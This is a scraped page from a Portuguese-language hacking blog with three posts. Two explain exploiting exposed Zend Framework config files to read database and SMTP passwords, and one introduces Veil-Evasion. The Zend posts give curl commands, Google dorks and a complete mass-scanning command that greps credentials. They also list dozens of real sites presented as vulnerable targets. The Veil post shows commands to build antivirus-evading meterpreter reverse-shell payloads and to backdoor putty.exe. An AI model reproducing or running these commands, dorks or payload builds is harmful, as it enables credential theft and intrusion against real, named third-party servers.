Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Framework. Mostrar todas as postagens
Mostrando postagens com marcador Framework. Mostrar todas as postagens

terça-feira, 8 de setembro de 2015

Explorando falha no Zend Framework Full Info Disclosure again! again!

3xpl0r4nd0 Z3nd Fr4m3w0rk Full 1nf0 D15cl05ur3

4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n!   Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins.  Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local.  Acessar informações como:

4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 

Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins.
Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local.
Acessar informações como:
  1. 'mail.transport.username'
  2. 'mail.transport.password'
  3. 'db.adapter'
  4. 'db.params.host'
  5. 'db.params.username'
  6. 'db.params.password'
  7. 'db.params.dbname'
Exemplo:
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"
resources.db.adapter = "PDO_MYSQL"
resources.db.params.host = "mysql.target.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123456"
resources.db.params.dbname = "db_app_teste"

Tais informações são encontradas no arquivo application.ini,db.ini,config.ini dentro da pasta /application/configs.

Exemplo de estrutura URL:
  • http://{taget}/pasta/application/configs/{arquivo}.ini
  • http://{taget}/application/configs/{arquivo}.ini
Acessando arquivo via CURL:
curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'

Acessando arquivo via CURL: curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'

Com o conceito de como acessar tal arquivo e do que podemos encontrar no mesmo, vamos para buscar servidores.

DORK[s]:

  • site:br index of "/application/configs/"
  • inurl:/application/configs/application.ini
  • site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"
  • -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini
  • inurl:/configs/ "params.password" db.ini ext:ini
  • -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password

Agora vamos explora em massa com SCANNER inurlbr

Montar comando baseado nas informações que já sabemos, o principal intuito achar possíveis servidores através de motores de busca e já testar o possível conteúdo de cada url encontrada.
O script INURLBR já possui por padrão um conjunto de strings para tal validação:
        
/* [*]ZEND FRAMEWORK
* Zend-Framework Full Info Disclosure
* The username and password of the database may be obtained trough 
* the "application.ini" file
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

COMMAND

SET DORK:
--dork '{YOU_DORK}'ou
--dork-file 'arquivo_dorks.txt'
Use:
--dork 'site:br index of "/application/configs/"'ou
--dork-file 'zend-dorks.txt'

SET ARQUIVO DE SAÍDA:
-s '{FILE}'
Use:
-s 'zend.txt'

SET ID DOS MOTORES DE BUSCA:
-q '{ID}'
Use:
-q 1,6,7,14,22

SET FILTRO DE URLS:Só é incluída no loop de testes urls que contenham a string setada em tal parâmetro.
--ifurl '{STRING_VALIDATION}'
Use:
--ifurl 'configs'

SET REPLACE - MANIPULAÇÃO DE URL:
--replace 'OLD_STRIN[INURL]NEW_STRING'
Use:
--replace '/configs[INURL]/configs/application.ini#'

Manipulação de URL exemplo:
URL original vinda do motor de busca ou arquivo:
http://www.target.com.br/pasta/application/configs/languages/de/

URL modificada pelo replace:
http://www.target.com.br/pasta/application/configs/application.ini#/languages/de/

A function substituiu a string /configs por /configs/application.ini# e tudo depois do "#" é ignorado.

SET COMANDO PERSONALIZADO: 
Só vai executar tal comando se o script achar algo que seja considerado vulnerável.
--commnad-vul '{COMMAND_LINE}'
Use:
--command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"
OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado
COMANDO COMPLETO:
php inurlbr.php --dork 'site:br index of "/application/configs/"-s 'zend.txt-q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#--command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"


PRINT OUTPUT:
OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado  COMANDO COMPLETO: php inurlbr.php --dork 'site:br index of "/application/configs/"' -s 'zend.txt' -q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#' --command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"




sexta-feira, 20 de março de 2015

Conhecendo Veil-framework

Veil-framework

Veil-framework

Veil-framework é uma coleção de ferramentas de segurança (red team) que implementam varios metodos de ataque, com foco
em burlar a detecçao dos anti-virus e 'Veil' é o super projecto para os lançamentos (stable) das ferramentas da veil-framework.
a framework é desenvolvida por: @Harmj0y, @ChrisTruncer, @TheMightyShiv.

E contem actualmente os seguintes modulos:
Veil-Evasion: uma ferramenta para gerar payloads indetectaveis (FUD) usando uma variedade de tecnicas e linguagens.
Veil-Catapult: um systema de entrega de payloads ao estilo do psexec (smb)
Veil-Pillage: uma ferramenta de pós-exploraçao modular (depois do alvo ser explorado)
Veil-PowerTools: projectos powershell com foco em operaçoes ofencivas
Veil-Ordnance: uma ferramenta para gerar shellcode e obfusca-lo usando 2 'encoders' escritos especialmente para este modulo.

Veil-framework: https://www.veil-framework.com/framework/veil-evasion/
Veil-framework (GITHUB): https://github.com/Veil-Framework/
e Veil super projecto (GITHUB): https://github.com/Veil-Framework/Veil
"e que recomendo á maioria dos usuarios a clonar e installar"
  1. [[ Download and install Veil Super Project ]]
  2. git clone https://github.com/Veil-Framework/Veil.git
  3. cd Veil
  4. chmod +x Install.sh
  5. ./install.sh
Como a framework é dividida em diferentes modulos seria dificil neste artigo me referir a todos eles, por isso vamos nos focar em descrever o modulo 'veil-Evasion' ( framework interface + command line syntax + cobalt strike 'cortana integration' ) que consiste na criação de payloads indetectaveis, deixando para outro artigo a descrição dos restantes modulos (veil-Catapult | Veil-Pillage | Veil-powerTools).





Veil-Evasion

A ferramenta de AV-evasão, escrita por Chris truncer chamada 'Veil-Evasion' propõe uma protecção eficaz contra a detecção de exploits autonomos, veil-evasion agrega varias tecnicas de injeção de shellcode em uma estrutura que simplifica o gerenciamento. Como framework Veil-Evasion possui varios recursos e inclui o seguinte:

1 - incorpora shellcode em uma variedade de linguagens de programaçao incluindo C, C#, Ruby, python
2 - pode integrar ferramentas externas como Hyperion (criptografia arquivo EXE com AES-128 bit) PEScrambler (obfuscate win32 binaries) e backdoor_factory (patch executaveis com shellcode e continuar a execução normal do estado anterior ao prepatched state)
3 - a sua funcionalidade pode ser 'scripted' para automatizar a implementação (command line syntax)
4 - payloads em python podem ser obfuscados/compilados em exe usando PyInstaller, Pwnstaller, Py2Exe.
5 - Veil-Evasion pode ser integrado no cobalt strike atravez da utilizaçao de um 'script cortana' (veil_evasion.cna) by Harmj0y.


Uma vez que um exploit foi criado, o tester deve verificar o payload contra o VirusTotal para garantir que ele não vai disparar um alerta quando é colocado no systema de destino, se a amostra é submetida directamente ao VirusTotal e é bandeirada (flag)  de comportamento como software malicioso, em seguida uma actualização de assinatura contra a apresentação pode ser libertada por antivirus (AV) fornecedores em menos de 1 hora, é por isso que os usuarios são advertidos com a mensagem:
"não enviar amostras para qualquer scanner online"

Veil-Evasion permite os testers de usar um check seguro contra VirusTotal. quando qualquer payload é gerado, um hash (SHA1) é criado e adicionado ao hashs.txt localizado no directorio do Veil-Framework (/usr/share/Veil-Evasion/hashs.txt), testers podem chamar o script 'checkvt' para apresentar os hashes para o VirusTotal, que irá verificar os valores de hash SHA1 contra a sua base de dados de mallware. se um payload Veil-Evasion desencadeia uma correspondencia, então o tester sabe que pode ser detectado pelo systema de destino. O 'checkvt' apresenta um resultado positivo (mallware) se 1 dos 44 AV's usados pelo Virus-Total o descobrir, (querendo dizer que ele pode ser considerado mallware só pelo AVG e mesmo assim a SHA1 ver flagged como mallware).

A equipe Veil-Evasion está começando algo que estamos chamando de "V-Day", para a vitória sobre a detecçao por parte dos AntiVírus. No dia 15 de cada mês pelo menos um novo módulo de carga útil (payload) será liberado.





   TUTORIAL 'c/meterpreter/rev_tcp' compiled to exe

list available payloads
TUTORIAL 'c/metrepreter/rev_tcp' compiled to exe  list available payloads


    select payload to be loaded
       select payload to be loaded


config payload settings
config payload settings


output payload name
output payload name


copy files to your home folder
copy files to your home folder


      lançar resource file (multi-handler): msfconsole -r inurlTuto_handler.rc
 lançar resource file (multi-handler): msfconsole -r inurlTuto_handler.rc


execute payload on target machine
execute payload on target machine




     'c/meterpreter/rev_tcp' compiled to exe (command line syntax)

   A framework tambem vem equipada de uma 'command line syntax' que pode ser usada para incorporar o Veil-Evasion nos nossos        propios projectos paralelos, e pode ser acedida com o command './Veil-Evasion.py -h' tambem nos podemos usar da 'syntax' da              ferramenta para criar o mesmo payload (c/meterpreter/rev_tcp) sem precisarmos de entrar na toolkit.

                                                                    Building payloads (command line syntax):
                 ./Veil-Evasion.py -p c/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o inurlTuto
                    ./Veil-Evasion.py -p auxiliary/coldwar_wrapper -c original_exe=/home/pedro/putty.exe -o putty-backdoored
   ./Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LHOST=192.168.1.68 LPORT=666 compile_to_exe=y -o rubypayload-to-exe

Files de configuração da tookit podem ser encontrados em '/etc/veil/settings.py' e permite-nos configurar 'internal settings' como:
1 - Path to output the source of payloads 2 - Path to output compiled payloads
3 - Whether to generate a msf handler script and where to place it
4 - The path to pyinstaller for example: /opt/pyinstaller-2.0/



    '(armitage & cobalt strike) Veil-Evasion cortana integration'

Cortana é uma linguagem de scripting de ataque baseada em 'sleep' ambos escritos por raphael mudge,
cortana permite a manipulaçao avançada de armitage ou cobalt strike. Harmj0y construiu um script (.cna) para intregar o Veil-Evasion directamente no armitage ou cobalt strike usando 'cortana scripting', para carrega-lo basta seleccionar 'script' -> load e navegar ate ao 'veil_evasion.cna' script para intergrar o Veil-Evasion directamenta nas frameworks armitage ou cobalt strike.

na primeira execuçao voce sera solicitado a introduzir o path de instalaçao da Veil-Evasion, depois de carregar o script cortana, um menu Veil-Evasion sera aberto na barra superior (cobalt strike), clicando sobre ele abre o 'Veil-Evasion' menu que ira permitir que voce gere uma carga util (payload). "em armitage teremos que loadar o script cortana em: armitage -> scripts -> load"
original article: https://www.veil-framework.com/veil-evasion-cortana-integration/








'c/meterpreter/rev_tcp' video tutorial

By @peterubuntu10[at]sourceforge[dot]net @2015
aka [ r00t-3xp10it ]


quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/